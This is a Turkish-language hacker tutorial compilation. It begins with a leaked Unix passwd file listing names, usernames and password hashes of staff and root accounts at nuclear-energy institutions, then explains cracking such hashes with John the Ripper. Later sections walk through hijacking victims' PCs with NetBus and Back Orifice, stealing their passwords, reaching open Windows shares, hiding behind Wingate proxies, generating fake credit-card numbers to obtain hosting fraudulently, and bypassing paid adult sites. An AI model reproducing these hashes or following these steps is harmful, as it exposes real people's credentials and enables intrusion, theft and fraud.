bodurn alDk8NzbfdoU:541:250:Nazan Bodur:/home/rif/bodurn:/bin/bash
bostanm:RSXR9GDBlOBTE:542:300:Melih Bostan:/home/fiz/bostanm:/bin/bash
celebin:8QfdEi0/2EZv2:543:270:Nilgun Celebi:/home/saf/celebin:/bin/bash
dincerb:Ei11tpbbK9ops:544:230:Betul Dincer:/home/kim/dincerb:/bin/bash
gultekin:J6faQXLhHvNEw:545:300:Ergun
Gultekin:/home/fiz/gultekin:/bin/bash
gungore:JkYdRn2X6ivv2:546:270:Emin Gungor:/home/saf/gungore:/bin/bash
sahinh:mNnEblEi8oVz.:547:201:Hasan Sahin:/home/cnaem/sahinh:/bin/bash
ozturkn:Bd8dnZQjzddrk:548:230:Neset Ozturk:/home/kim/ozturkn:/bin/bash
reyhanca:KGcikUdVikuvs:549:300:Atilla
Reyhancan:/home/fiz/reyhanca:/bin/bash
ngd:nn:550:400:Nukleer Guvenlik Dairesi:/home/taek/ngd:/bin/bash
anaem:ccc:551:400:ANAEM:/home/taek/anaem:/bin/ bash
erduran:NgEavV94BD9VY:552:300:Nizamettin
Erduran:/home/fiz/erduran:/bin/bash
nhtg xx:553:400:NHTG:/home/taek/nhtg:/bin/bash
rgd:zzz:554:400:RGD:/home/taek/rgd:/bin/bash
cnaem:ccc:555:200:CNAEM:/home/cnaem/cnaem:/bin/ bash
apakv:CpYe0oeGMCOdI:556:230:Vildan Apak:/home/kim/apakv:/bin/bash
bayulken:OcxNbtUuOttak:512:230 eval
Bayulken:/home/kim/bayulken:/bin/bash
ardagiln:BcclwAyDgYkYs:515:230:Nesrin
Ardagil:/home/kim/ardagiln:/bin/bash
karakell gPmJbKoo/0TU:518:230:Bektas
Karakelle:/home/kim/karakell:/bin/bash
unala:HkbDXjJ3vJpV6:519:230:Unal Azakliogullari:/home/kim/unala:/bin/bash
yilmazy pR/oJRp7PERQ:520:230:Yusuf Z. Yilmaz:/home/kim/yilmazy:/bin/bash
tekd:bbb:528:400:TAEK Teknoloji Dairesi:/home/taek/tekd:/bin/bash
necati:GkXn/ae.y8bKs:533:310:Necati
Kucukarslan:/home/nel/necati:/bin/bash
www:987:557:500:www Users:/users/www:/bin/bash
akyols aF5UBFvEr7Bw:558:210 evgi AKYOL:/home/rea/akyols:/bin/bash
ozcinarbd48qQhIJs0kA:560:270:Berna OZCINAR:/home/saf/ozcinarb:/bin/bash
sevdikb:OecxtOT03rKMA:561:210:Bulent Sevdik:/home/rea/sevdikb:/bin/bash
incem:IiYBQEI0ZpcOY:562:300:Mehmet Zeki Ince:/home/fiz/incem:/bin/bash
kahraman:FS2OPYtiw49L6:563:270:Alper
Kahraman:/home/saf/kahraman:/bin/bash
varinlia:GfmjacT6ct6Fw:564:290:Ahmet
Varinlioglu:/home/rbi/varinlia:/bin/bash
altunh:5csmkn3uoCpyg:565:270:Hasret ALTUNKAYA:/home/saf/altunh:/bin/bash
yilmazf:IE.EN2vUu41HU:566:270:Fatma YILMAZ:/home/saf/yilmazf:/bin/bash
kutd:Fc7lvTDNhJYYQ:567:280 eniz KUT:/home/end/kutd:/bin/bash
tacacs anHMVraPXPA.:1500:400::/home/tacacs:/bin/bash
admin R0HTvLEIhtSM:1499:0:Administrator:/home/admin:/ bin/bash
arpadt:OivHOGPoX1IAU:570:270:Tulin ARPAD:/home/saf/arpadt:/bin/bash
vurale:HjNyW9EI.woao:569:210:Ertac VURAL:/home/rea/vurale:/bin/bash
isyara:OlYWR.EcdVdKU:571:210:Arif ISYAR:/home/rea/isyara:/bin/bash
uzonuro:AaABahtiOEo6A:572:210:Onur UZONUR:/home/rea/uzonuro:/bin/bash
yilmazer:NdQM4Rux/7iT2:210:210:Ayhan
YILMAZER:/home/rea/yilmazer:/bin/bash
bahcecig:AhfABAP0XgS0k:573:210:Gulfem
BAHCECI:/home/rea/bahcecig:/bin/bash
koth:AjVcf4ywDlr3w:574:210:Halil KOT:/home/rea/koth:/bin/bash
elberk:IlBiB9Glgycn.:575:210:Kamil ELBER:/home/rea/elberk:/bin/bash
yasard:VvVMMfuQ4cMRM:576:270 ogan YASAR:/home/saf/yasard:/bin/bash
nyts97:7U3sUENdky6JU:577:220:NUKLEER YAKIT
SEMPOZYUMU:/home/nyt/nyts97:/bin/bash
yoneticiLSMMkABUJ7ic:0:0:Bilgisayar Yoneticisi:/root:/bin/bash
gungorn:dnwkv/5qByrG.:568:290:Nurdan GUNGOR:/home/rbi/gungorn:/bin/bash
bingolda:76l9JUAaRzDoo:578:280:Murat
BINGOLDAG:/home/end/bingolda:/bin/bash
can:LfbBn4bgycs7o:559:100 evket Can:/home/can:/bin/bash
saricams NNbo8vGVmu3Y:579:280 erdar
SARICAM:/home/end/saricams:/bin/bash
bassaria:AfgztlGy2RQJs:580:280:Asiye BASSARI:/home/end/bassaria:/bin/bash
webadmin:Hc5/aIVU/XuuE:581:500:WEB ADMINISTER:/home/webadmin:/bin/bash
ekincis:CjiBia7MbWbs.:582:280 inasi EKINCI:/home/end/ekincis:/bin/bash
aksum:EjFB5hSVLq7Nk:583:280:Mehmet AKSU:/home/end/aksum:/bin/bash
akyuzt:ChgnRmxYcdEuc:584:280:Tanil AKYUZ:/home/end/akyuzt:/bin/bash
karahang:GgJGJA8ospSqU:585:270:Gursel
KARAHAN:/home/saf/karahang:/bin/bash
topcuo:NibHkZNNL/IH6:587:290 ayhan TOPCUOGLU:/home/rbi/topcuo:/bin/bash
kurtcebe:Jk/kUfYoDiUP6:588:280:Tekin
KURTCEBE:/home/end/kurtcebe:/bin/bash
ozturkh:AeyVxXMofhxoU:589:310:Hamza OZTURK:/home/nel/ozturkh:/bin/bash
dogruozm:CjKo7YL/IvXZo:590:280:Mustafa
DOGRUOZ:/home/end/dogruozm:/bin/bash
karainci m3sh7Ih56T7Y:591:280:Nihat
KARAINCI:/home/end/karainci:/bin/bash
info:Bjt9LmUnKpWr6:592:100:CNAEM Information:/home/cnaem/info:/bin/bash
cezzar:Eg/sn2Q/pXsCg:593:290:Rezzan
KUCUKCEZZAR:/home/rbi/cezzar:/bin/bash
tasdelen:A2afZOosjl7xk:594:270:Muslum
TASDELEM:/home/saf/tasdelen:/bin/bash
kocakm:eV51wNMJ9CpM2:595:270:Mehmet KOCAK:/home/saf/kocakm:/bin/bash
-----------------
Yukarýdaki metinden alýnmýþ
rasgele bir satýrýn açýklamasý :
Örnek satýr :
canf nNSukj82XXEA:502:220:Ferhan CAN:/home/nyt/canf:/bin/bash
Kullanýcý
adý(user) : canf
Kodlanmýþ Password : DnNSukj82XXEA
Kullanýcý numarasý : 502:220
Kullanýcý ismi : Ferhan CAN
Dizin : /home/nyt/canf
Türü : /bin/bash
Yukarýda
anlaþýldýðý gibi herþey apaçýk
ortada fakat bir sorun var.O da kodlanmýþ password.Bu kodu
nasýl çözüp de þifreyi alacaksýnýz.Cracker Jack
veya John The Ripper gibi cracker programlarýyla
yapacaksýnýz. Benim tavsiyem John The Ripper
kullanmanýz.Çünkü kullanýmý basittir ))
Not: Bu arada shadowed
denilen bir olay daha vardýr.Bu da aþaðýdaki
gibidir :
Örnek satýr 1 :
canf::502:220:Ferhan CAN:/home/nyt/canf:/bin/bash
Örnek satýr 2 :
canf:*:502:220:Ferhan CAN:/home/nyt/canf:/bin/bash
Kullanýcý adý(user)
KodlanmýþPassword
Kullanýcý no
Kullanýcý ismi Dizin
Türü
canf
; ;
502:220
Ferhan CAN /home/nyt/canf
/bin/bash
canf
;
*
502:220
Ferhan CAN /home/nyt/canf
/bin/bash
Gördüðünüz gibi
kodlanmýþ password bölümü ya boþ
býrakýlarak ya da * ve x iþareti kullanýlarak
gölgelenmiþtir yani shadowed edilmiþtir.Bu tür þifreleri
kýramazsýnýz.
Passwd
dosyalarýný kýrma Tavsiyem John The Ripper olduðu
için bu programýn kullanýmýný
anlatacaðým.
1) Wordlist metodu ile
kýrma
Bu metodla
kýrarken kullandýðýnýz wordlistin içinde
bulunan kelimeler denenir.
Kullanýmý
: john -w:
Örnek : john
passwd.txt -w:words.lst
2)Brute force attack
metodu ile kýrma
Bu metod çok uzun
sürecektir.Çünkü John belirttiðiniz minimum-maximum arasý bütün
kombinasyonlarý deneyecektir. Önce John amcanýn
kýrarken kullandýðý birkaç yöntemi bilelim :
ALL :
Hepsi -
ALPHA : Sadece harfler
-
DIGITS : Sadece
rakamlar
Not: Türkiye'de
süperonline dýþýndaki bütün isslerde min=4 max=8 hane
olduðundan kýracaðýnýz þifre
süperonline deðilse aþaðýda belirttiðim gibi
yapýn.
Öncelikle John The
Ripper'ýn bulunduðu kalsörün içindeki john.ini
dosyasýný açýn ve bu dosyanýn editine girin.
Ve yukarýda belirttiðim gibi kýrarken kullanmak
istediðiniz yöntemi seçin.Ben þimdi ALL seçtiðinizi
varsayýyorum.John.ini dosyasýnýn editinden ALL
bölümünü bulun.Hemen altýnda MinLen = 1 ve MaxLen = 8 gibi
yazýlar göreceksiniz.Tavsiyem MinLen'i 4 yapmanýz.Adamlar
enayimi 1 haneli þifre koycak ))Gerekli deðiþikliði
yaptýktan sonra kaydedip çýkýn ve ms-dos
satýrýna geçin.Ve daha sonra :
Kullanýmý
: john
kýracaðýnýzdosya -i:kýrmayöntemi
Örnek :
john passwd.txt -i:ALL
3)Single metodu
Bu metodla
kullanýcý adý ve kullanýcý bilgileri
sýrayla kýrýlýr.. Doðum
tarihlerini,isim-soyadlarýnýn çeþitli
kombinasyonlarýný þifre olarak kullananlarý
kýrmak için bu metod þiddetle tavsiye edilir.
Ör =>
Cobratti Sanane : Cobras,Scobra...gibi
Kullanýmý
: john -single
Örnek :
john -single passwd.txt
DÝKKAT!!! : Bütün bu yöntemlerde kýrýlan
þifrelerin diziliþ formatý þöyledir :
password (username) => þifre
(kullanýcý adý
Netbus
Pc sistemlerine girmemizi
saglayan bir program. Backorrifice ve master paradiese kadar çok islevi
olmasa bile basitligi ile oldukça basarili. Programin server dosyasinin
karsi pc de açildikdan sonra pc ye girebilirsiniz. Ama netbus artik çok
duyuldu ve server dosyasi (patch.exe) yi artil herkes icon undan yada
boyutundan taniyor bu yuzden isiniz oldukça zor ilerde netbus un server
dosyasini diger dosyalara bulastirmayi da anlatacagim.
Simdi indirmis oldugunuz netbus paketindeki dosyalari taniyalim
Netbus.exe : Bizim pc ye saldirmak için kullanacagimiz yazilim.
Patch.exe : Karsi pc ye yollanmasi gereken server programi
Host : Listemize kaydetmis oldugumuz, eklemis oldugumuz ip numaralari bu
dosyanin içine yazilir. Ilk aldigiunizda bu dosya olmayacakdir sonradan
olusur.
Temp.jpg: Karsi pc nin o anki goruntusunu screendump yaparak cekmis
oldugumuz resimler ilk olarak boyle kaydedilir. Eger bi sefer yaptikdan
sonra dosyanin yedegini almazsaniz bi sornaki goruntude onun uzerine
yazilir.
Netbusdaki komutlar ve gorevleri
Open Cdrom: Cdrom u açar,kapatir
Show image: Resim dosyalarini gösterir
Swap Mouse: Mouse cursor unu gostermez-geri açar
Start Program: Karsi pcdeki bi programi çalistitir.
Msg Manager: Mesaj Yollarsiniz. (hata mesajlari)
Screendump: O anki karsi pc nin ekran goruntusunu jpg olarak pcnize atar.
Get Info: Patch in nerde oldugu ve karsi pc de kaç kisinin daha oldugunu
gösterir.
Port Redirect: Port u degistirir.
Play Sound: Ses dosyasi çalistirir.
Exit Windows: Windows'u kapatir-Reset attirir-Askiya alir.
Send Text: Mesaj yollamanizi saglar
Active Winds: O anki aktif programlari gosterir.
Mouse pos: Mouse elegecirir..
Listen: Karsidakinin ne yazdigini gösterir
Sound System: Karsi pcnin ses ayarlari ile hasir nesir olabilmek için.
Server Setup: Ayar olayi.
Control Mouse: Mousu ele geçirir.
Go to Url: Sizin istediginiz urlye yollar karsidakini
Key Manager: Klavyeyi kitler-açar
File Manager: Dosya yollamak,almak için
IRC
'DE NASIL BANLANMAZSINIZ IP SPOOOF
Wingate ile IP spoofing
yapin BAN ve K-Line'lardan ve Tabiki Oplardan Korkmayin!!!!
Wingate internet cafelerde, sirketlerde ve bunun gibi bircok bilgisayari
birbirine baglayan yerlerde kullanilan
bir protokoldur. Tabii bizim ilgilendigimiz bolumse wingate'in 23. portu.
Bu 23. portu kullanarak
IRC de Op lar tarafindan BAN'lansek, K-Line koysalar ve hatta Domain
yapsalar bile istedigimiz
kanala rahatca girebiliriz. Wingate' in bir diger ozelligi ise NUKE yeme,
ekranin kararmasina, hattan
dusmeye son veriyo kesinlikle wingate yaptiktan sonra NUKE yemek yok!!!
WinGate>
Ilk yapmamaiz gereken sey once 23. port'u bulan yani bos wingate serverini
bulan WingateScan
programini cekmek. Bu kullanilmasi oldukca basit bir program irc'de
gordugunuz ip'leri buraya yaziyosunuz ve o kendiliginden wingate servery
buluyor
Mesela: Mirc ekraninda Phiber_Optik join zurna from 212.55.66.98' diye
kimin nerden baglandigini
gosteren yazilar gecer hemen burdaki ip numarasini 212.55.66.98 'i
wingateScan progrminda
IP yazan bolume giriyoruz WingateScan programi 212.55.68.00'dan
212.55.66.255' e
kadar olan bolumde wingate serverini arar ve diyelimki 212.55.68.155'te
wingate
buldu assagidaki server found bolumunde hemen cikar!
Mirc'i aciyoruz karsimiza cikan beyaz sayfada
/server 212.55.68.155:23
yaziyoruz ve karsimiza Wingate diye bi yazi cikacak daha sonra yine
bitakim yazilar cikacak
/quote user xxxxx xxxxx [/U][/URL] Netbus-Detector mirc
addonu
Yukarýda
belirtilenleri temin ettikten sonra ava çýkabiliriz.
Yukarýda belirtilen Netbus-Detector mirc addonunu Chat
programýnýzýn bulunduðu klasöre açýn :
c:mirc (mesela). Daha sonra chat programýnýzý
çalýþtýrýn. Ve status bölümünde
þunlarý yazýn :
/load -rs NetBus.mrc
=> yazýn ve enter'a basýn
/load -rs Net-Aliases.mrc
=> yazýn ve enter'a basýn
/load -rs BusScan.mrc
=> yazýn ve enter'a basýn
Bunlarý her
yazýþýnýzdan sonra
Loaded script
'c:mircnetbus.mrc
gibi bir yazýyla
karþýlaþýrsanýz bu iþ oldu
demektir. Chate girin mesela irc.dal.net'teki #zurna kanalý
olabilir (Kanal ne kadar büyük olursa o kadar iyi olur. Tabi ne kadar
fazla büyük kanala girerseniz o kadar iyi). Þimdi beklemeye
baþlayýn. Neyi mi bekliyorsunuz? Kanala giren
kiþilerden netbus sheepi açýk olanlarýn size teslim
olmasýný. Az önce yüklediðimiz mirc addonun
mantýðý kanala join olan kiþilerin 12345'inci
portunu yoklayýp Netbus açýðý var mý
hýzlý bir þekilde araþtýrmak.
Bulduðunda ise o anki nickiniz size özel açacak ve "Þu kanaldaki
þu host/ip'li kiþide netbus sheepi bulunmuþtur." diyerek
size haber verecek. Sizde hemen ip'yi alacaksýnýz ve
netbusdan baðlanacaksýnýz. O da ne karþý
bilgisayar þifre korumalý. Hemen gaban'ý
çalýþtýrýp þifreyi deðiþtirin.
Daha sonra Netbus'dan tekrar baðlanýn ve
karþýnýza gelen þifre sorusuna az önce
belirttiðiniz þifreyi yazarak bilgisayarýna girin. Bu
kadar basit.
Nbtstat Ile Karsi Pc yi Trojansiz Elegecirmek
Dos komut satirinda
nbtstat -A <IP adresi> komutunu veriyoruz. Basarili Olmussak:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
^M0REBID <00> UNIQUE Registered
VIRTUAL COMPUTE<00> GROUP Registered
^M0REBID <03> UNIQUE Registered
MAC Address = 44-45-53-54-00-00
gibi bir cikti almamiz gerekir. Burada ^MOREBID bilgisayarin ismidir.
Bizim icin önemli olan da bu.
c- Windows dizininin altinda lmhosts isminde bir dosya olusturuyoruz.
("Edit lmhosts" komutuyla) Eger ki daha önceden lmhosts dosyasi varsa bile
yapacagimiz is: x.x.x.x ^MOREBID satirini eklemek (x.x.x.x IP adresi,
^MOREBID bilgisayarin adi)
d- Simdi de dos komut satirinda nbtstat -r komutuyla lmhosts dosyasina
eklediklerimizi networkumuze tanitiyoruz.
e- Simdi Windows'a dönme zamani. Baslat/Bul/Bilgisayarlar menusunden
UNIQUE adini vererek (Yukarida ekran ciktisinda ^MOREBID <00> UNIQUE
Registered satirindaki Unique) bilgisayari aratiyoruz. Bu islemler
yaptiktan sonra bilgisayar bulunuyor. Bilgisayar seklinin uzerine cift
tiklayip harddiskini görebiliyoruz.
Not: Bu olay kirmak istediginiz ana bilgisayarin dosya paylasimina acik
olmasi durumunda calisir.
Bedava Domainmi almak istiyonuz?
Þu sýralarda
internette çok popüler olan domain, server... olayýný
anlatacaðým. Eðer internette yoðun olarak
warez,hack,adult tipi sitelere uðramakta iseniz,sizde bu iþi
merak ediyorsunuz demektir. Bu yazýdan sonra eminim ki
merakýnýz büyük ölçüde azalacaktýr. Warez, hack,
adult tipi siteler aþýrý derecede server
ihtiyacý duyarlar. Yani bulunduklarý server ne kadar büyük
olursa o kadar daha fazla program, resim... gibi þeyler koyarak hit
almak amacýndadýrlar. Günümüzde de domain, server... denen
þeylerin fiyatlarý ortadadýr. Þimdi siz
diyeceksiniz : "Domain server gibi þeyler pahalý diyorsun
fakat ortalýk domainden geçilmiyor. Önüne gelen domain, server
falan almýþ bu iþ nasýl oluyor?".
Ýþte bizim esas konumuz da budur. Bu adamlar
serverlarý nasýl alýyorlar? Para mý
veriyorlar? Yoksa baþka bir yol mu var?
1) Yukarýda
anlattýðým olay her domain almýþ kiþi
için geçerli deðildir. Yani kendi parasýyla warez serveri ya da
domain almýþ kiþiler vardýr.
2)
Aþaðýda anlatacaðým olayý denemeniz
halinde baþýnýza gelebileceklerin mesuliyeti tamamen
size aittir.
3) 2.Þýktan
korkup da yazýyý okumaktan vazgeçmeyin. Çünkü
aþaðýda bu olayý en güvenli þekilde
nasýl yapilabildiðini de anlattým. 4) Bedava domain ve
küçük bir server veren yer istiyorsanýz www.webjump.com ya da
www.hypermart.net adresinden alabilirsiniz. Büyük bir server
istiyorsanýz aþaðýdaki yazýyý
okuyunuz.
Eveettt. Artýk
heyecanla beklenen an geldi. Fakat hack olayýndan önce
tedbirlerimizi almalýyýz deðil mi? ) Ýlk olarak
analog bir hattan baðlanmaya çalýþýn. Isp'nizi
arayarak isp'nizin analog hat telefon numarasýný
sorabilirsiniz. Daha sonra browser'ýnýzda proxy
ayarlarýnýzý yapýn. Avrupa'da bulunan bir
proxy'yi kulllanmakta yarar var. Bütün bunlarý yaptýktan
sonra bir sahte kredi kartý accsi bulmaya geldi sýra.
Elinize babanýzýn veya annenizin kredi kartýný
alýn. Sahte kredi kartý programýnýzý
çalýþtýrýn. Bu programlarý nette
heryerde bulabilirsiniz. Eðer hiç görmedim diyorsanýz,
yazýnýn burdan sonrasýný
okumayýnýz. Sahte Kredi Kartý programýndan
extrapolate tuþuna basýn ve önünüze gelen boþ
kutucuða sahip olduðunuz kredi kartýnýzýn
numarasýný yazýn. Daha sonra önünüze gelen
rakamlardan rastgele not edin. Bu arada kendi esas kredi
kartýnýzýn son kullanma tarihini de not edin. Buraya
kadar baþarýyla geldiyseniz iþlemin birinci bölümü
bitmiþ demektir. Hadi geçmiþ olsun.
Internette bir sürü
parayla domain, server... satan yerler vardýr. Ýþte bu
adreslerden gazlamasý kolay olan bir adres vereceðim :
www.hostingdeals.com. Bu verdiðim adres gerçekten çok gaz bir yerdir.
Yani 300 MB'lik bir alaný kolay bir þekilde elde
edebilirsiniz. Ýlla benim size verdiðim bu adresi kullanmak
zorunda deðilsiniz tabi fakat gazlamaya bu kolay adresten
baþlarsanýz ilerde daha büyük kapasiteli yerlerde elde
edebilirsiniz. Bu da sizin kabiliyetinize kalmýþ birþey
artýk. Ne demiþler : Önce Emeklenir, Sonra Yürünür, Sonra
Koþulur... Az önce verdiðim adrese gidin ve sign up linkine
týklayýn. Karþýnýza gelen pencereyi
mantýklý-sallama bilgilerle doldurun. En önemlisi e-mail
adresinizi mutlaka doðru verin. Daha sonra devam edin.
Karþýnýza 1-2 pencere daha çýkacak
bunlarý da mantýklý-sallama bilgilerle doldurun. Bu
arada verinizin yeteneklerini belirteceðiniz bir pencere gelecek
buradan hepsini iþaretleyin ne de olsa beleþ server,
herþeyi tamam olsun deðil mi yani... Önemli : Fiyat Ödeme
Þekillerinden en sað alt köþede olaný seçin.Sonra
en önemli pencere geliyoruz : Paranýn ödeneceði yer.
Ýsim bölümüne zaten tikmen ismimiz yazýlýr. Çünkü
daha önce bu bilgiyi vermiþtik. Kredi kart numarasý bölümüne
size daha önce not etmenizi istediðim numaralardan birini
yazýn. Son kullanma tarihi bölümünü de size daha önce not etmenizi
istediðim son kullanma tarihini ay/yýl; formatýnda
yazarak doldurun. Ve daha sonra done yapýp iþlemi bitirin.
300 MB'lik baba domain+serveriniz yaklaþýk 24 saat içinde
açýlacaktýr. Hepinize hayýrlý olsun.
Baþka yazýlarda görüþmek dileðiyle...byez
byez...
ADULT SITE
HACK
INTERNETTE BIR SURU ADULT SITESI VAR VE
HEPSIDE BAZI SCRIPTLER JAVALAR VEYA REFERRER
KULLANARAK BIRBIRINE LINK VERIYOR BEN BIR HACKER DEGILIM AMA UFAK BAZI
IPUCLARI VEREBILIRIM
YAPMANIZ GEREKEN ILK IS BISEYLER YURUTMEK ISTEDIGINIZ SITENIN PASSWORD
UNUN ELDE ETMEK
BUNUN ICIN BIR SURU PASSWORD SITELERI
VAR YA BUNLARDAN ELDE EDERSINIZ PASSWORDLERI TABI SABIR ISI BU BEN AZIM
ETTIM BIR KAC TANE
BULDUM CALISAN PASSWORD BU SITE O SEKILDE YAPILMISTIR YADA TUM WAREZ
SITELERINDE CREDIT
MASTER 4 VE CARD PRO GIBI PROGRAMLAR DAGITILIR BUNLARIN ISLEVI SIZE
HAZIRDA BAZI KREDI KARTI
NUMARALARI VERIRLER AMA
ELBETTE KI BU VERDIKLERI NUMARALAR HICBIR ISE YARAMAZ YAPMANIZ GEREKEN
ONCELIKLE GERCEK BIR
KREDI KARTI BULMAKTIR VE BU KARTTAN O PROGRAM VASITASIYLA NUMARALAR
URETMEKTIR BU
PROGRAMLAR SIZE 1000
TANE FALAN KART URETIR. ISIN ASIL PUF NOKTASI SU, BU URETTIGINIZ KREDI
KARTLARI NIN HEPSININ
BITIS TARIHLERI AYNI BOYLECE ELINIZDEKI KARTI KULLANARAK SIFRE
ALABILIRSINIZ FAKAT DIKKAT
HICBIR SEKILDE EMAIL YADA KENDINIZI BELLI EDECEK BILGI VERMEYIN SADECE
SANAL ISLERINIZI O
APTAL ADULT SITELERINDEN PASSWORD ALMAK GIBI ISLERINIZI YAPIN BU
KESINLIKLE BIR SUC TESKIL
EDER SAKIN HERHANGI BIR MAL SIPARIS ETMEYIN BIRINDEN ALDIGIM BILGIYE GORE
NEYSE KI ADULT
SITELERI BU KARTLARDAN PARA CEKEMEMEKTEDIR CUNKU USTLERINDEKI ISIMLER
TUTMAZ BU IYI HABER
KIMSEYE ZARARINIZ YOK AMA BU ISI YAPMAYIN RISKI BUYUK.SAHTE ACCOUNT
KULLANMAYA DIKKAT EDIN.KIMLIK VERMEYIN VEYA www.anonymizer.com BU ADRESE
GIDIP BASVURUN IP
NUMARANIZI ONLAR SIZIN ICIN SAKLAYACAKLARDIR.
HERNEYSE BIR SITENIN PASSWORDUNU ELE GECIRDIKTEN SONRA SITEDE ARKA KAPI
(YANI SIFRESIZ BIR
YER) VAR MI DIYE KONTROL ETMEK YERINE BU ISI TELEPORT PRO ILE YAPIN TABI
SITEDEKI RESIMLERI
BULMAYA AYAPLAMAYIN TELEPORT PRO YU YOKSA ISINIZ UZUN SURER BUNLARI
TELEPORT PRO
VASITASIYLA CEKTIKTEN SONRA ELINIZLE
KONTROL EDIN OZELLIKLE MEMBERS DIYE BASLIYAN YERLER VAR ISE BU TIP YERLERI
GENELDE SIFRELIDIR
SIFRELI OLMAYABILIR AMA SANSINIZ VAR ISE SITEDE BASKA BIR YERE LINK
VERILMISSE MESELA SIZ
WWW.XXX.COM/MEMBERS TASINIZ ONLAR WWW.YYY.COM GIBI BIR YERE LINK VERMISLER
ISE ORANIN
BEDAVA OLMASI IHTIMALI VAR. EGER GIRILMIYORSA BOS BIR SAYFA CIKIYORSA
BUNLAR REFERER
KULLANIYORLAR DEMEKTIR ONLARI KIRMAYI DA ANLATACAGIM
ASLINDA ASIL AMACINIZ SITEDE CGI-BIN YADA CGI-WIN DIYE OLAN DOSYALARI
BULMAKTIR BUNLAR COK
BUYUK IHTIMALLE BASKA YERLERE VERDIKLERI REFERRER LINKLERINI YADAKENDI
SITELERINDEKI BEDAVA
GIRISLERI GOSTERIR MESELA SU ORNEKTEKI GIBI
[URL="https://tik.lat/sp2Ux"] http://www.clubwicked.com/cgi-bin/stryseek.cgi?[/URL] head=index.html
bu mesela sitenin ana sayfasini acar eger
[URL="https://tik.lat/fqhEV"] http://www.clubwicked.com/cgi-bin/stryseek.cgi?[/URL] head=cinemax.html
derdeniz sitenin sinema sayfasina gidersiniz vb bunun gibi sitedeki
adreslere bakarak dolasirsiniz. BAZEN DE REFERER
KULLANMAK GEREKIR YANI SIZ ADRESI DIREKT YAZSANIZ GIREMEZSINIZ AMA O
ADRESTEN TIKLARSANIZ
GIRERSINIZ BEN YENI BIR YOL BULDUM BU COK KOLAY BIR YOL BOYLECE BUTUN
DUNYANIN *** SITELERI
AYAGINIZIN DIBINDE BAKIN MESELA SU ADRES BIR ORNEK OLSUN
[URL="https://tik.lat/jLJGa"] http://www.adultmagazine.com/cgi-bin/tv?page=1998/[/URL] 08/cover.html&ID=00409666
BAKIN AACIP GARIP BIR SURU SALAK ISARETLE DOLU BIR ADRES ONCE BU ADRESE
GIDIN SIZE MUTLAKA
INTERNAL SERVER ERROR HATASI VERECEK HEHE ASLINDA SIZ ICERDESINIZ SIZI
KANDIRIYO ADAM
GITMENIZ GEREKEN ADRES ASLINDA SU ISE TUM FAZLALIKLARI ATALIM BU ADRESE
GIREMEDINIZ SIMDI
AYNI SAYFADA FAZLALILLARI ATALIM VE
SOYLE YAZALIM
[URL="https://tik.lat/1Vrnp"] http://www.adultmagazine.com/1998/08/cover.html[/URL]
cgi-bin i attim; /tv?page= i attim &ID=00409666 i attim boylece
sayfadayim
BAZI ADRESLER DE SIZIN NEREDEN GELDIGIZE BAKARAK SIZI HEMEN BASKA BIR
SAYFAYA GONDERMEYE
KALKARLAR NE YAPMANIZ GEREK O SIZI ISTEDIGI SAYFAYA GONDERMEDEN ONCE HEMEN
STOP A BASIN KI
O SAYFAYA GITMESIN O SAYFADA KALIN BU SAYFA SIZIN NEREDEN GELDIGINIZE
BAKARAK SIZI YA PARA
ISTEDIGI SAYFAYA YA DA GERCEK VIDEO YADA RESIM SAYFASINA GONDERIR OYLEYSE
BIZ STOP A BASIP
BIZI GONDERECEGI GERCEK RESIM VEYA VIDEO SAYFASNA GIDERIZ O KADAR MESELA
[URL="https://tik.lat/bAlau"] http://www.missx.com/live/liv.cgi?ty...ame=pics2.html[/URL]
BU SAYFA SIZI HEMEN MEMBERS KLASORUNE ATMAYA CALISACAKTIR
HEMEN STOP A BASIN INTERNAL SERVER ERROR DIYINCE TABI IKI UC KERE O
SAYFADA KALIN EEE SIMDI
NEREYE GIDECEZ TABI KI ANA KLASORLERINE GIDELIM
[URL="https://tik.lat/gTQE1"] http://www.missx.com/live/[/URL]
YAZDIGIMIZ ZAMAN 100BINLERCE RESIM KARSIMIZDA NOT:BU HERIFLER ACAIP
DONEKTIR BEN BU YAZIYI
YAZARKEN BU OLAY CALISIYODU BU BIR ORNEKTIR LINKI
KAPAYABILIRLER
BILGISAYARA NASIL GIRILIR
Bu bolumde,
baskalarýnýn bilgisayarýna girme ve internet
sifrelerini calma olaylarýný ogrenicez..
Ýlk olarak bu olaylarý gerceklestirmek icin 4 adet programa
ihtiyacimiz var..Wingate,
Netbus,Bo, Telnet(her windowsun icinde vardir)..Diger programlari
cehennemin
Ýlk olarak irc'de kendimize bir kurban secip, ip
numarasýný alýyoruz (/dns nickname)..
Sonra wingate'i calýstýrýyoruz..
"Hostname or Ip" yazan yere kurbanýmýzýn ip
numarasýný giriyoruz..
"Scan Port" kýsmýnda 23 seklindeki rakamlarý 12345
yapýyoruz sonra asagýdan
3. secenek olan try to open the port only" i secerek "scan!" butonuna
basýyoruz..
"Servers found" kýsmýnda bir kac tane ip yazmasý
lazým sansa bir tanesini secin..
Sonra netbus'ý calýstýrýp hostname/ip yazan
yere wingateden buldugunuz ipyi yazýn..
Sifre isterse telnetten sifreyi kýrmamýz lazým..Eger
sifre istemezse isiniz kolay...
Ben sifre istedi varsayýyorum ve anlatmaya devam...
Telnet her windowsta vardir...Bul (find) dan telnet'i buldurup
calýstýrýn...
Baglana gelip uzaktaki sistem'e týklayýn...
Ana bilgisyar adý: wingatede buldugmuz ipyi yazýyoruz
Baglantý Noktasý kýsmýna ise netbus portu olan
12345 yaziyoruz..baglana týklýyoruz..
yukarda netbus 1.6 veya 1.7 yazar..
simdi sifreyi kirmak icin
Password;1;123 ServerPwd;anatolia
bu yazýyý pasteliyoruz...ve sifre cehennem oluyor,siz
sifreyi
cehennem yerine baska bir seylerde yapabilirsiniz..
Sonra bir daha netbus'a gidiyoruz artýk sifre anatolia
giriyoruz...Artýk adamýn
bilgisayrýndayýz..
file manager'a gelerek adama boserve.exe yi yolluyoruz...nereye
yolliycagimizi soruyor..
c:windows yazarak windowsun altina atiyoruz
yolladiktan sonra download ewkranýný kapiyoruz..
start program diyoruz...c:windowsboserve.exe diyoruz...
tamam netbustaki isimizde bitti..
Þimdi Back Orifice'ye geçiyoruz
target host orta adamýn ipsini yazýyoruz..yan tarafada
12345
yan taraftan system passwordsu secip send e basýyoruz ve bingoooo
bu adýmda 10un ustunde password varmis..
Bo da dah cok sey yapabilirsiniz ama onlarida sonra anlatirimmm..
bu arada adamdan cikan passler
